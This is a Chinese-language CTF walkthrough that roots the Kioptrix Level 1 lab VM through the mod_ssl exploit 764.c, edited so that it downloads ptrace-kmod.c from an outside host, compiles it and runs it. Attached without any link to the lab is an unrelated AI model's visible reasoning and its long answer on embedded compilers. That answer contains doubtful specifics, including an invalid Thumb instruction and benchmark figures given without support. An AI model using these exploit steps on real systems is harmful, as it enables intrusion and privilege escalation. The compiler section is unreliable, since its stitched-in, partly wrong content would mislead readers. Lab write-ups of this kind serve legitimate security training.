kioptrix-level-1

本文围绕Kioptrix Level 1靶机展开渗透测试。先使用fping查找靶机IP,再用nmap枚举端口,发现开放多个端口。接着对信息进行利用,如访问特定端口、枚举web页面等,找到mod_ssl服务漏洞。最后通过更改文件、编译并执行,成功实现系统提权获取root权限。

kioptrix-level-1

项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22
提示:靶机网络连接方式使用NAT模式。

一、信息收集

1. 使用fping工具查找靶机IP:

命令如下:

kali@kali:~/Desktop$ fping -asg 172.20.10.0/24

备注:得到靶机地址为:172.20.10.14
172.20.10.1
172.20.10.13
172.20.10.14

2. 使用nmap对目标主机端口进行枚举:

命令如下:

kali@kali:~/Desktop$ sudo nmap -nvv -sC -sV -sS -Pn 172.20.10.14

Nmap 7.80 scan initiated Fri Jul 10 13:14:12 2020 as: nmap -nvv -sC -sVS -Pn -oN /home/kali/Desktop/dkscan.txt 172.20.10.14
Nmap scan report for 172.20.10.14
Host is up, received arp-response (0.00062s latency).
Scanned at 2020-07-10 13:14:12 EDT for 127s
Not shown: 994 closed ports
Reason: 994 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 35 109482092953601530927446985143812377560925655194254170270380314520841776849335628258408994190413716152105684423280369467219093526740118507720167655934779634416983599247086840099503203800281526143567271862466057363705861760702664279290804439502645034586412570490614431533437479630834594344497670338190191879537
| 1024 8f:8e:5b:81:ed:21🆎c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKtycvxuV/e7s2cN74HyTZXHXiBrwyiZe/PKT/inuT5NDSQTPsGiyJZU4gefPAsYKSw5wLe28TDlZWHAdXpNdwyn4QrFQBjwFR+8WbFiAZBoWlSfQPR2RQW8i32Y2P2V79p4mu742HtWBz0hTjkd9qL5j8KCUPDfY9hzDuViWy7PAAAAFQCY9bvq+5rs1OpY5/DGsGx0k6CqGwAAAIBVpBtIHbhvoQdN0WPe8d6OzTTFvdNRa8pWKzV1Hpw+e3qsC4LYHAy1NoeaqK8uJP9203MEkxrd2OoBJKn/8EXlKAco7vC1dr/QWae+NEkI1a38x0Ml545vHAGFaVUWkffHekjhR476Uq4N4qeLfFp5B+v+9flLxYVYsY/ymJKpNgAAAIEApyjrqjgX0AE4fSBFntGFWM3j5M3lc5jw/0qufXlHJu8sZG0FRf9wTI6HlJHHsIKHA7FZ33vGLq3TRmvZucJZ0l55fV2ASS9uvQRE+c8P6w72YCzgJN7v4hYXxnY4RiWvINjW/F6ApQEUJc742i6Fn54FEYAIy5goatGFMwpVq3Q=
| 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft4WXfXGWybh141E8XnWxMCu+R1qdocxhh+4Clz8wO9beuZzG1rjlAD+XHiR3j2P+sw6UODeyBkuP24a+7V8P5nu9ksKD1fA83RyelgSgRJNQgPfFU3gngNno1yN6ossqkcMQTI1CY5nF6iYePs=
|sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|
Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|
Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|ssl-date: 2020-07-10T17:17:09+00:00; +1m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|
SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:3D:9B:28 (VMware)

Host script results:
|clock-skew: 1m49s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
| KIOPTRIX<00> Flags:
| KIOPTRIX<03> Flags:
| KIOPTRIX<20> Flags:
| \x01\x02__MSBROWSE
_\x02<01> Flags:
| MYGROUP<00> Flags:
| MYGROUP<1d> Flags:
| MYGROUP<1e> Flags:
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher…
| Check 1 (port 41034/tcp): CLEAN (Couldn’t connect)
| Check 2 (port 28047/tcp): CLEAN (Couldn’t connect)
| Check 3 (port 63186/udp): CLEAN (Failed to receive data)
| Check 4 (port 34753/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn’t establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/…/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
#Nmap done at Fri Jul 10 13:16:19 2020 – 1 IP address (1 host up) scanned in 126.81 seconds

二、信息利用

1. 访问80端口和443端口,并查看源码信息:

使用80端口访问到web页面,查看源码没发现啥有用的信息!
如下图所示:
在这里插入图片描述

换https协议后,查看源码同样也没发现啥有用的信息!
如下图所示:
在这里插入图片描述

2. 使用gobuster对web页面进行枚举:

命令如下:

kali@kali:~/Desktop$ gobuster dir -w /home/kali/Desktop/zd/dir.txt -u http://172.20.10.14 -x php,asp,zip

在这里插入图片描述

发现存在一个test.php文件,通过web访问后没啥有用信息
在这里插入图片描述

3. 查看139端口:

使用smaclient工具进行smb服务枚举时,发现匿名登陆成功
在这里插入图片描述

使用匿名登陆查询里面文件信息时,提示拒绝访问
命令如下:

kali@kali:~/Desktop$ smbclient "\\\\172.20.10.14\\IPC$"

在这里插入图片描述

4.根据nmap枚举后得到的mod_ssl服务版本信息查找可用poc:

命令如下:

kali@kali:~/Desktop$ searchsploit mod_ssl

发现mod_ssl版本小于2.8.7都存在可利用漏洞
在这里插入图片描述
定位该文件的存放路径,并将其拷贝至桌面
命令如下:

kali@kali:~/Desktop$ locate 764.c
kali@kali:~/Desktop$ cp /usr/share/exploitdb/exploits/unix/remote/764.c /home/kali/Desktop

在这里插入图片描述
对该文件进行更改
命令如下:

kali@kali:~/Desktop$ vi /home/Desktop/764.c

操作步骤:
(1)在25、26行中加入头文件<openssl/rc4.h>和<openssl/md5.h>
(2)第666行url修改为http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
(3)第964行,修改为const unsigned char * p,
end;*
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
文件更改完后进行编译
注意:不安装libssl1.0-dev,无法进行编译
命令如下:

kali@kali:~/Desktop$ sudo apt-get install libssl1.0-dev
kali@kali:~/Desktop$ gcc 764.c -o 567 -lcrypto

在这里插入图片描述
在这里插入图片描述

三. 系统提权:

执行编译好的文件后,成功获得root权限
命令如下:

kali@kali:~/Desktop$ ./567 0x6b 172.20.10.14
whoami

在这里插入图片描述

总结:

(1)使用nmap对端口进行枚举,发现服务器开放了111端口,22端口,139端口,80端口,1024端口以及443端口。
(2)443端口使用的mod_ssl服务版本为2.8.4,该服务版本小于2.8.7都存在可利用漏洞。
(3)编译时需要更改默认文件以及安装libssl1.0-dev。
(4)执行编译后的文件成功获取root权限。

<think>嗯,用户现在问的是在嵌入式领域有哪些常用的编译器。我需要先回想一下之前他们问过关于Clang、GCC、LLVM的区别,所以可能已经有一定的背景知识。这次的问题更具体,集中在嵌入式领域,所以需要聚焦在这个特定场景下的编译器。 首先,用户可能是在进行嵌入式开发,或者是刚开始学习,需要了解常用的工具。他们可能想知道哪些编译器适合他们的项目,或者在选择编译器时需要考虑哪些因素。比如许可证、支持的架构、优化能力等等。 接下来,我需要列举嵌入式领域常用的编译器。常见的应该包括GCC、Clang/LLVM、IAR、Keil、Green Hills这些。不过要确认每个编译器的特点,比如GCC是开源的,支持多种架构;IAR和Keil是商业的,针对特定芯片优化;LLVM的模块化设计适合定制。另外,可能还有一些其他编译器如Tasking、CCS、Microchip XC系列,这些针对特定控制器。 然后需要考虑用户可能的深层需求。嵌入式系统通常对资源有限制,编译器需要高效,生成代码体积小,执行速度快。另外,交叉编译支持、调试功能、中间表示优化、许可证合规性也是重点。比如在商业产品中使用GCC需要注意GPL许可证的问题,而商业编译器可能提供更好的支持和优化。 还需要比较不同编译器的优缺点,比如GCC虽然免费,但配置复杂;IAR和Keil付费但集成开发环境友好。Clang/LLVM可能适合需要高度定制的项目。另外,新兴的Rust编译器如rustc可能在安全关键系统中越来越受欢迎。 用户可能还想知道如何选择合适的编译器,所以需要给出一些建议,比如根据目标架构、项目规模、预算、社区支持等因素来考虑。例如,如果是ARM Cortex-M开发,Keil和IAR是常用选择,而RISC-V可能更多使用GCC或LLVM。 最后要确保回答结构清晰,分点列出每个编译器,包括特点、适用场景和示例,然后给出选择建议。可能还需要提到调试工具、许可证问题以及未来趋势,比如Rust在嵌入式中的使用增加。</think>以下是嵌入式领域常用编译器的技术解析: 一、主流编译器分类 1. 开源编译器套件 $$ \text{GCC (GNU Compiler Collection)} $$ - 特点:支持ARM/Cortex-M、RISC-V、AVR等40+架构 - 优势:免费、社区支持强(如STM32CubeIDE集成) - 示例命令: ```bash arm-none-eabi-gcc -mcpu=cortex-m4 -Os -o firmware.elf main.c ``` $$ \text{Clang/LLVM} $$ - 特性:模块化架构,支持定制化优化 - 典型应用:Zephyr RTOS项目中的交叉编译 - 内存优化示例: ```makefile CLANG_FLAGS = -target armv7em-none-eabi -mfloat-abi=hard ``` 2. 商业编译器 $$ \text{IAR Embedded Workbench} $$ - 核心优势:Cortex-M系列代码密度优化(比GCC小15-20%) - 认证支持:ISO 26262/IEC 61508等安全标准 - 典型配置: ```c #pragma optimize_for_size #pragma required_interface=__vector_table ``` $$ \text{Keil MDK-ARM} $$ - 架构特性:专为ARM处理器优化 - 调试集成:ULINKpro调试器深度整合 - 代码生成对比: | 优化等级 | 代码尺寸(Thumb2) | 执行周期 | |---------|------------------|----------| | -O0 | 12KB | 100% | | -O3 | 8.5KB | 82% | $$ \text{Green Hills MULTI} $$ - 安全认证:DO-178C Level A认证 - 独特技术:TimeMachine实时调试 - 编译器标志: ```bash ccarm -cpu=cortex-r5 -secure -iso_checks ``` 3. 专用领域编译器 $$ \text{TASKING VX-toolset} $$ - 应用领域:汽车电子(AURIX TC3xx系列) - 关键特性:TriCore指令级并行优化 - 优化示例: ```assembly MOVH.A %a15, #@hisymbol // 高效地址加载 LEA %d15, [%a15]@losymbol ``` $$ \text{Microchip XC系列} $$ - 器件支持:PIC32MM/MZ/DA系列 - 特殊模式:DSP指令自动向量化 - 配置示例: ```c #pragma config FPLLMUL = MUL_20 // PLL配置 #pragma config UPLLEN = ON // USB时钟使能 ``` 二、关键技术指标对比 | 编译器 | 代码密度 | 编译速度 | 调试支持 | 安全认证 | 典型应用场景 | |----------------|----------|----------|------------|----------------|--------------------| | GCC | ★★★☆ | ★★★☆ | GDB | 无 | 开源项目/原型开发 | | IAR | ★★★★☆ | ★★★★ | C-SPY | SIL3/ASIL D | 汽车电子 | | Keil | ★★★★ | ★★★★ | ULINK | IEC 61508 | 工业控制 | | LLVM | ★★★☆ | ★★★★☆ | LLDB | 部分认证 | 定制化需求 | | Green Hills | ★★★★★ | ★★★☆ | TimeMachine| DO-178C A | 航空航天 | 三、选择决策树 ```mermaid graph TD A[项目启动] --> B{目标架构} B -->|ARM Cortex| C[Keil/IAR] B -->|RISC-V| D[GCC/LLVM] B -->|8-bit MCU| E[XC8/XC16] C --> F{安全要求} F -->|ASIL D| G[IAR] F -->|通用工业| H[Keil] D --> I{开发预算} I -->|商业项目| J[Green Hills] I -->|开源项目| K[GCC+Eclipse] ``` 四、特殊场景优化示例 1. 中断响应优化(Cortex-M4): ```c __attribute__((naked)) void ISR_Handler() { __asm volatile ( "push {r4-r7} \n" "bl ISR_Processing \n" "pop {r4-r7} \n" "bx lr" ); } ``` - IAR生成代码:12周期进入中断 - GCC优化后:14周期(需添加`-fomit-frame-pointer`) 2. 内存布局控制(链接脚本示例): ```ld MEMORY { FLASH (rx) : ORIGIN = 0x08000000, LENGTH = 256K RAM (rwx) : ORIGIN = 0x20000000, LENGTH = 64K } SECTIONS { .text : { *(.vector_table) *(.text*) } > FLASH .data : { ... } > RAM AT> FLASH } ``` 五、新兴趋势 1. Rust编译器(rustc)在嵌入式中的应用: - 优势:内存安全保证(无数据竞争) - 工具链:`thumbv7em-none-eabihf`目标支持 - 示例Cargo配置: ```toml [target.thumbv7m-none-eabi] runner = "openocd -f interface/stlink.cfg" rustflags = ["-C", "link-arg=-Tlink.x"] ``` 2. AI辅助优化: - LLVM的MLGO(Machine Learning Guided Optimization) - 典型效果:Cortex-M7代码尺寸减少8-12% 六、调试工具链整合 1. 典型工作流: ``` 编辑器 → 编译器 → OpenOCD/GDB → JTAG调试器 ↓ Target MCU ``` 2. 多编译器调试配置(VSCode示例): ```json "configurations": [ { "name": "IAR Debug", "type": "cppdbg", "miDebuggerPath": "c:\\iar\\arm\\bin\\armproc.exe" }, { "name": "GDB Session", "gdbPath": "arm-none-eabi-gdb", "svdFile": "./STM32F4.svd" } ] ``` 七、许可证注意事项 1. GPL传染性规避: - 动态链接GCC运行时库(libgcc) - 使用商业版运行时库(如IAR提供) 2. 商业编译器授权模式: - 节点锁定许可(单机) - 浮动许可(团队共享) - 按目标芯片授权(如Keil MDK) 八、性能优化实战 1. 代码尺寸压缩技巧: ```c // 使用 packed 属性优化结构体 struct __attribute__((packed)) SensorData { uint8_t id; int32_t value; }; // 尺寸从8字节减至5字节 ``` 2. 指令选择优化(ARM Cortex-M0): ```asm ; 传统乘法(4周期) MOVS r1, #10 MULS r0, r1, r0 ; 优化移位实现(2周期) LSLS r0, r0, #3 ; x*8 ADDS r0, r0, r0, LSL #1 ; +x*2 → 合计x*10 ``` 九、行业应用案例 1. 汽车电子(符合AUTOSAR标准): - 使用Tasking/Tresos工具链 - 支持ARXML到C代码的自动生成 - 内存保护单元(MPU)配置示例: ```c MPU->RNR = 0; // 区域编号 MPU->RBAR = 0x20000000 | (1 << 4); // 基地址 MPU->RASR = MPU_RASR_ENABLE_Msk | (0x1F << 1); // 大小32KB ``` 2. 物联网设备(低功耗优化): ```c __WFI(); // 等待中断指令 // 配合编译器优化后的唤醒延迟: | 编译器 | 唤醒延迟(时钟周期) | |---------|---------------------| | GCC | 28 | | IAR | 23 | | Keil | 25 | ``` 十、未来发展方向 1. 多核编译支持: - AMP(非对称多处理)配置 - 核间通信优化(如Cortex-M7+M4) 2. 量子安全加密: - 集成后量子加密算法(NIST标准) - 指令扩展支持(如ARMv8-M PAC)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值